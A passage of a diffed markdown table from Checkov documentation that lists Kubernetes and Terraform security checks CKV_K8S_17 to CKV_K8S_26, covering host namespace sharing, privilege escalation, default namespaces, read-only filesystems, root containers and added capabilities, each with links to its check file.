[ShareHostPID.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ShareHostPID.py) | -| 2570 | CKV_K8S_17 | resource | kubernetes_deployment | Do not admit containers wishing to share the host process ID namespace | Terraform | [ShareHostPID.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ShareHostPID.py) | -| 2571 | CKV_K8S_17 | resource | kubernetes_deployment_v1 | Do not admit containers wishing to share the host process ID namespace | Terraform | [ShareHostPID.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ShareHostPID.py) | -| 2572 | CKV_K8S_17 | resource | kubernetes_pod | Do not admit containers wishing to share the host process ID namespace | Terraform | [ShareHostPID.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ShareHostPID.py) | -| 2573 | CKV_K8S_17 | resource | kubernetes_pod_v1 | Do not admit containers wishing to share the host process ID namespace | Terraform | [ShareHostPID.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ShareHostPID.py) | -| 2574 | CKV_K8S_18 | resource | CronJob | Containers should not share the host IPC namespace | Kubernetes | [ShareHostIPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ShareHostIPC.py) | -| 2575 | CKV_K8S_18 | resource | DaemonSet | Containers should not share the host IPC namespace | Kubernetes | [ShareHostIPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ShareHostIPC.py) | -| 2576 | CKV_K8S_18 | resource | Deployment | Containers should not share the host IPC namespace | Kubernetes | [ShareHostIPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ShareHostIPC.py) | -| 2577 | CKV_K8S_18 | resource | Job | Containers should not share 
the host IPC namespace | Kubernetes | [ShareHostIPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ShareHostIPC.py) | -| 2578 | CKV_K8S_18 | resource | Pod | Containers should not share the host IPC namespace | Kubernetes | [ShareHostIPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ShareHostIPC.py) | -| 2579 | CKV_K8S_18 | resource | ReplicaSet | Containers should not share the host IPC namespace | Kubernetes | [ShareHostIPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ShareHostIPC.py) | -| 2580 | CKV_K8S_18 | resource | ReplicationController | Containers should not share the host IPC namespace | Kubernetes | [ShareHostIPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ShareHostIPC.py) | -| 2581 | CKV_K8S_18 | resource | StatefulSet | Containers should not share the host IPC namespace | Kubernetes | [ShareHostIPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ShareHostIPC.py) | -| 2582 | CKV_K8S_18 | resource | kubernetes_deployment | Do not admit containers wishing to share the host IPC namespace | Terraform | [ShareHostIPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ShareHostIPC.py) | -| 2583 | CKV_K8S_18 | resource | kubernetes_deployment_v1 | Do not admit containers wishing to share the host IPC namespace | Terraform | [ShareHostIPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ShareHostIPC.py) | -| 2584 | CKV_K8S_18 | resource | kubernetes_pod | Do not admit containers wishing to share the host IPC namespace | Terraform | [ShareHostIPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ShareHostIPC.py) | -| 2585 | CKV_K8S_18 | resource | kubernetes_pod_v1 | Do not admit 
containers wishing to share the host IPC namespace | Terraform | [ShareHostIPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ShareHostIPC.py) | -| 2586 | CKV_K8S_19 | resource | CronJob | Containers should not share the host network namespace | Kubernetes | [SharedHostNetworkNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SharedHostNetworkNamespace.py) | -| 2587 | CKV_K8S_19 | resource | DaemonSet | Containers should not share the host network namespace | Kubernetes | [SharedHostNetworkNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SharedHostNetworkNamespace.py) | -| 2588 | CKV_K8S_19 | resource | Deployment | Containers should not share the host network namespace | Kubernetes | [SharedHostNetworkNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SharedHostNetworkNamespace.py) | -| 2589 | CKV_K8S_19 | resource | Job | Containers should not share the host network namespace | Kubernetes | [SharedHostNetworkNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SharedHostNetworkNamespace.py) | -| 2590 | CKV_K8S_19 | resource | Pod | Containers should not share the host network namespace | Kubernetes | [SharedHostNetworkNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SharedHostNetworkNamespace.py) | -| 2591 | CKV_K8S_19 | resource | ReplicaSet | Containers should not share the host network namespace | Kubernetes | [SharedHostNetworkNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SharedHostNetworkNamespace.py) | -| 2592 | CKV_K8S_19 | resource | ReplicationController | Containers should not share the host network namespace | Kubernetes | 
[SharedHostNetworkNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SharedHostNetworkNamespace.py) | -| 2593 | CKV_K8S_19 | resource | StatefulSet | Containers should not share the host network namespace | Kubernetes | [SharedHostNetworkNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SharedHostNetworkNamespace.py) | -| 2594 | CKV_K8S_19 | resource | kubernetes_deployment | Do not admit containers wishing to share the host network namespace | Terraform | [SharedHostNetworkNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/SharedHostNetworkNamespace.py) | -| 2595 | CKV_K8S_19 | resource | kubernetes_deployment_v1 | Do not admit containers wishing to share the host network namespace | Terraform | [SharedHostNetworkNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/SharedHostNetworkNamespace.py) | -| 2596 | CKV_K8S_19 | resource | kubernetes_pod | Do not admit containers wishing to share the host network namespace | Terraform | [SharedHostNetworkNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/SharedHostNetworkNamespace.py) | -| 2597 | CKV_K8S_19 | resource | kubernetes_pod_v1 | Do not admit containers wishing to share the host network namespace | Terraform | [SharedHostNetworkNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/SharedHostNetworkNamespace.py) | -| 2598 | CKV_K8S_20 | resource | CronJob | Containers should not run with allowPrivilegeEscalation | Kubernetes | [AllowPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowPrivilegeEscalation.py) | -| 2599 | CKV_K8S_20 | resource | DaemonSet | Containers should not run with allowPrivilegeEscalation | Kubernetes | 
[AllowPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowPrivilegeEscalation.py) | -| 2600 | CKV_K8S_20 | resource | Deployment | Containers should not run with allowPrivilegeEscalation | Kubernetes | [AllowPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowPrivilegeEscalation.py) | -| 2601 | CKV_K8S_20 | resource | DeploymentConfig | Containers should not run with allowPrivilegeEscalation | Kubernetes | [AllowPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowPrivilegeEscalation.py) | -| 2602 | CKV_K8S_20 | resource | Job | Containers should not run with allowPrivilegeEscalation | Kubernetes | [AllowPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowPrivilegeEscalation.py) | -| 2603 | CKV_K8S_20 | resource | Pod | Containers should not run with allowPrivilegeEscalation | Kubernetes | [AllowPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowPrivilegeEscalation.py) | -| 2604 | CKV_K8S_20 | resource | PodTemplate | Containers should not run with allowPrivilegeEscalation | Kubernetes | [AllowPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowPrivilegeEscalation.py) | -| 2605 | CKV_K8S_20 | resource | ReplicaSet | Containers should not run with allowPrivilegeEscalation | Kubernetes | [AllowPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowPrivilegeEscalation.py) | -| 2606 | CKV_K8S_20 | resource | ReplicationController | Containers should not run with allowPrivilegeEscalation | Kubernetes | 
[AllowPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowPrivilegeEscalation.py) | -| 2607 | CKV_K8S_20 | resource | StatefulSet | Containers should not run with allowPrivilegeEscalation | Kubernetes | [AllowPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowPrivilegeEscalation.py) | -| 2608 | CKV_K8S_20 | resource | kubernetes_deployment | Containers should not run with allowPrivilegeEscalation | Terraform | [AllowPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowPrivilegeEscalation.py) | -| 2609 | CKV_K8S_20 | resource | kubernetes_deployment_v1 | Containers should not run with allowPrivilegeEscalation | Terraform | [AllowPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowPrivilegeEscalation.py) | -| 2610 | CKV_K8S_20 | resource | kubernetes_pod | Containers should not run with allowPrivilegeEscalation | Terraform | [AllowPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowPrivilegeEscalation.py) | -| 2611 | CKV_K8S_20 | resource | kubernetes_pod_v1 | Containers should not run with allowPrivilegeEscalation | Terraform | [AllowPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowPrivilegeEscalation.py) | -| 2612 | CKV_K8S_21 | resource | ConfigMap | The default namespace should not be used | Kubernetes | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DefaultNamespace.py) | -| 2613 | CKV_K8S_21 | resource | CronJob | The default namespace should not be used | Kubernetes | 
[DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DefaultNamespace.py) | -| 2614 | CKV_K8S_21 | resource | DaemonSet | The default namespace should not be used | Kubernetes | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DefaultNamespace.py) | -| 2615 | CKV_K8S_21 | resource | Deployment | The default namespace should not be used | Kubernetes | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DefaultNamespace.py) | -| 2616 | CKV_K8S_21 | resource | Ingress | The default namespace should not be used | Kubernetes | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DefaultNamespace.py) | -| 2617 | CKV_K8S_21 | resource | Job | The default namespace should not be used | Kubernetes | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DefaultNamespace.py) | -| 2618 | CKV_K8S_21 | resource | Pod | The default namespace should not be used | Kubernetes | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DefaultNamespace.py) | -| 2619 | CKV_K8S_21 | resource | ReplicaSet | The default namespace should not be used | Kubernetes | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DefaultNamespace.py) | -| 2620 | CKV_K8S_21 | resource | ReplicationController | The default namespace should not be used | Kubernetes | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DefaultNamespace.py) | -| 2621 | CKV_K8S_21 | resource | Role | The default namespace should not be used | Kubernetes | 
[DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DefaultNamespace.py) | -| 2622 | CKV_K8S_21 | resource | RoleBinding | The default namespace should not be used | Kubernetes | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DefaultNamespace.py) | -| 2623 | CKV_K8S_21 | resource | Secret | The default namespace should not be used | Kubernetes | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DefaultNamespace.py) | -| 2624 | CKV_K8S_21 | resource | Service | The default namespace should not be used | Kubernetes | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DefaultNamespace.py) | -| 2625 | CKV_K8S_21 | resource | ServiceAccount | The default namespace should not be used | Kubernetes | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DefaultNamespace.py) | -| 2626 | CKV_K8S_21 | resource | StatefulSet | The default namespace should not be used | Kubernetes | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/DefaultNamespace.py) | -| 2627 | CKV_K8S_21 | resource | kubernetes_config_map | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | -| 2628 | CKV_K8S_21 | resource | kubernetes_config_map_v1 | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | -| 2629 | CKV_K8S_21 | resource | kubernetes_cron_job | The default namespace should not be used | Terraform | 
[DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | -| 2630 | CKV_K8S_21 | resource | kubernetes_cron_job_v1 | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | -| 2631 | CKV_K8S_21 | resource | kubernetes_daemon_set_v1 | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | -| 2632 | CKV_K8S_21 | resource | kubernetes_daemonset | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | -| 2633 | CKV_K8S_21 | resource | kubernetes_deployment | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | -| 2634 | CKV_K8S_21 | resource | kubernetes_deployment_v1 | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | -| 2635 | CKV_K8S_21 | resource | kubernetes_ingress | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | -| 2636 | CKV_K8S_21 | resource | kubernetes_ingress_v1 | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | -| 2637 | CKV_K8S_21 | resource | kubernetes_job | The default namespace should not 
be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | -| 2638 | CKV_K8S_21 | resource | kubernetes_job_v1 | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | -| 2639 | CKV_K8S_21 | resource | kubernetes_pod | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | -| 2640 | CKV_K8S_21 | resource | kubernetes_pod_v1 | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | -| 2641 | CKV_K8S_21 | resource | kubernetes_replication_controller | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | -| 2642 | CKV_K8S_21 | resource | kubernetes_replication_controller_v1 | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | -| 2643 | CKV_K8S_21 | resource | kubernetes_role_binding | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | -| 2644 | CKV_K8S_21 | resource | kubernetes_role_binding_v1 | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | -| 2645 | CKV_K8S_21 | resource | 
kubernetes_secret | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | -| 2646 | CKV_K8S_21 | resource | kubernetes_secret_v1 | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | -| 2647 | CKV_K8S_21 | resource | kubernetes_service | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | -| 2648 | CKV_K8S_21 | resource | kubernetes_service_account | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | -| 2649 | CKV_K8S_21 | resource | kubernetes_service_account_v1 | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | -| 2650 | CKV_K8S_21 | resource | kubernetes_service_v1 | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | -| 2651 | CKV_K8S_21 | resource | kubernetes_stateful_set | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) | -| 2652 | CKV_K8S_21 | resource | kubernetes_stateful_set_v1 | The default namespace should not be used | Terraform | [DefaultNamespace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultNamespace.py) 
| -| 2653 | CKV_K8S_22 | resource | CronJob | Use read-only filesystem for containers where possible | Kubernetes | [ReadOnlyFilesystem.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ReadOnlyFilesystem.py) | -| 2654 | CKV_K8S_22 | resource | DaemonSet | Use read-only filesystem for containers where possible | Kubernetes | [ReadOnlyFilesystem.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ReadOnlyFilesystem.py) | -| 2655 | CKV_K8S_22 | resource | Deployment | Use read-only filesystem for containers where possible | Kubernetes | [ReadOnlyFilesystem.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ReadOnlyFilesystem.py) | -| 2656 | CKV_K8S_22 | resource | DeploymentConfig | Use read-only filesystem for containers where possible | Kubernetes | [ReadOnlyFilesystem.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ReadOnlyFilesystem.py) | -| 2657 | CKV_K8S_22 | resource | Job | Use read-only filesystem for containers where possible | Kubernetes | [ReadOnlyFilesystem.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ReadOnlyFilesystem.py) | -| 2658 | CKV_K8S_22 | resource | Pod | Use read-only filesystem for containers where possible | Kubernetes | [ReadOnlyFilesystem.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ReadOnlyFilesystem.py) | -| 2659 | CKV_K8S_22 | resource | PodTemplate | Use read-only filesystem for containers where possible | Kubernetes | [ReadOnlyFilesystem.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ReadOnlyFilesystem.py) | -| 2660 | CKV_K8S_22 | resource | ReplicaSet | Use read-only filesystem for containers where possible | Kubernetes | 
[ReadOnlyFilesystem.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ReadOnlyFilesystem.py) | -| 2661 | CKV_K8S_22 | resource | ReplicationController | Use read-only filesystem for containers where possible | Kubernetes | [ReadOnlyFilesystem.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ReadOnlyFilesystem.py) | -| 2662 | CKV_K8S_22 | resource | StatefulSet | Use read-only filesystem for containers where possible | Kubernetes | [ReadOnlyFilesystem.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ReadOnlyFilesystem.py) | -| 2663 | CKV_K8S_22 | resource | kubernetes_deployment | Use read-only filesystem for containers where possible | Terraform | [ReadonlyRootFilesystem.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ReadonlyRootFilesystem.py) | -| 2664 | CKV_K8S_22 | resource | kubernetes_deployment_v1 | Use read-only filesystem for containers where possible | Terraform | [ReadonlyRootFilesystem.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ReadonlyRootFilesystem.py) | -| 2665 | CKV_K8S_22 | resource | kubernetes_pod | Use read-only filesystem for containers where possible | Terraform | [ReadonlyRootFilesystem.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ReadonlyRootFilesystem.py) | -| 2666 | CKV_K8S_22 | resource | kubernetes_pod_v1 | Use read-only filesystem for containers where possible | Terraform | [ReadonlyRootFilesystem.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ReadonlyRootFilesystem.py) | -| 2667 | CKV_K8S_23 | resource | CronJob | Minimize the admission of root containers | Kubernetes | [RootContainers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RootContainers.py) | 
-| 2668 | CKV_K8S_23 | resource | DaemonSet | Minimize the admission of root containers | Kubernetes | [RootContainers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RootContainers.py) | -| 2669 | CKV_K8S_23 | resource | Deployment | Minimize the admission of root containers | Kubernetes | [RootContainers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RootContainers.py) | -| 2670 | CKV_K8S_23 | resource | Job | Minimize the admission of root containers | Kubernetes | [RootContainers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RootContainers.py) | -| 2671 | CKV_K8S_23 | resource | Pod | Minimize the admission of root containers | Kubernetes | [RootContainers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RootContainers.py) | -| 2672 | CKV_K8S_23 | resource | ReplicaSet | Minimize the admission of root containers | Kubernetes | [RootContainers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RootContainers.py) | -| 2673 | CKV_K8S_23 | resource | ReplicationController | Minimize the admission of root containers | Kubernetes | [RootContainers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RootContainers.py) | -| 2674 | CKV_K8S_23 | resource | StatefulSet | Minimize the admission of root containers | Kubernetes | [RootContainers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RootContainers.py) | -| 2675 | CKV_K8S_24 | resource | PodSecurityPolicy | Do not allow containers with added capability | Kubernetes | [AllowedCapabilitiesPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowedCapabilitiesPSP.py) | -| 2676 | CKV_K8S_24 | resource | kubernetes_pod_security_policy | Do not allow containers with added 
capability | Terraform | [AllowedCapabilitiesPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowedCapabilitiesPSP.py) | -| 2677 | CKV_K8S_25 | resource | CronJob | Minimize the admission of containers with added capability | Kubernetes | [AllowedCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowedCapabilities.py) | -| 2678 | CKV_K8S_25 | resource | DaemonSet | Minimize the admission of containers with added capability | Kubernetes | [AllowedCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowedCapabilities.py) | -| 2679 | CKV_K8S_25 | resource | Deployment | Minimize the admission of containers with added capability | Kubernetes | [AllowedCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowedCapabilities.py) | -| 2680 | CKV_K8S_25 | resource | DeploymentConfig | Minimize the admission of containers with added capability | Kubernetes | [AllowedCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowedCapabilities.py) | -| 2681 | CKV_K8S_25 | resource | Job | Minimize the admission of containers with added capability | Kubernetes | [AllowedCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowedCapabilities.py) | -| 2682 | CKV_K8S_25 | resource | Pod | Minimize the admission of containers with added capability | Kubernetes | [AllowedCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowedCapabilities.py) | -| 2683 | CKV_K8S_25 | resource | PodTemplate | Minimize the admission of containers with added capability | Kubernetes | [AllowedCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowedCapabilities.py) | -| 
2684 | CKV_K8S_25 | resource | ReplicaSet | Minimize the admission of containers with added capability | Kubernetes | [AllowedCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowedCapabilities.py) | -| 2685 | CKV_K8S_25 | resource | ReplicationController | Minimize the admission of containers with added capability | Kubernetes | [AllowedCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowedCapabilities.py) | -| 2686 | CKV_K8S_25 | resource | StatefulSet | Minimize the admission of containers with added capability | Kubernetes | [AllowedCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/AllowedCapabilities.py) | -| 2687 | CKV_K8S_25 | resource | kubernetes_deployment | Minimize the admission of containers with added capability | Terraform | [AllowedCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowedCapabilities.py) | -| 2688 | CKV_K8S_25 | resource | kubernetes_deployment_v1 | Minimize the admission of containers with added capability | Terraform | [AllowedCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowedCapabilities.py) | -| 2689 | CKV_K8S_25 | resource | kubernetes_pod | Minimize the admission of containers with added capability | Terraform | [AllowedCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowedCapabilities.py) | -| 2690 | CKV_K8S_25 | resource | kubernetes_pod_v1 | Minimize the admission of containers with added capability | Terraform | [AllowedCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowedCapabilities.py) | -| 2691 | CKV_K8S_26 | resource | CronJob | Do not specify hostPort unless absolutely necessary | 
